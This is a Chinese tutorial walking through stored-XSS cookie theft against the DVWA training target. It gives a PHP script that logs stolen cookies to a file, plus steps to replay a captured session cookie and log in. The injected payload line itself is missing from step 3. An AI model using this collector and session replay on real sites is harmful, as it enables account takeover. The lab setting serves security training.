漏洞复现篇——利用XSS漏洞获取cookie

实验环境:

  • PHPstudy
  • 火狐浏览器、IE
  • DVWA靶场

实验准备:

在www目录下创建一个名为1.php的文件,内容如下:


$file = fopen("1.txt","a");
if($_GET['cookie']){
	$cookie = $_GET['cookie'];
	fputs ($file,"$cookie\n");
}
?>

漏洞复现篇——利用XSS漏洞获取cookie_第1张图片

模拟实验:

1、把级别调成low,选择Stored储存型

漏洞复现篇——利用XSS漏洞获取cookie_第2张图片

2、按F12打开查看器,选中图示区域,然后将值改为500

漏洞复现篇——利用XSS漏洞获取cookie_第3张图片

3、将输入到留言框中保存

漏洞复现篇——利用XSS漏洞获取cookie_第4张图片

4、在同目录下会生成1.txt文件,里面为成功登录的cookie

漏洞复现篇——利用XSS漏洞获取cookie_第5张图片

5、换个浏览器将cookie值改成文件中的值,然后把url改成index.php

漏洞复现篇——利用XSS漏洞获取cookie_第6张图片

6、然后执行,成功进入

漏洞复现篇——利用XSS漏洞获取cookie_第7张图片

你可能感兴趣的:(渗透测试)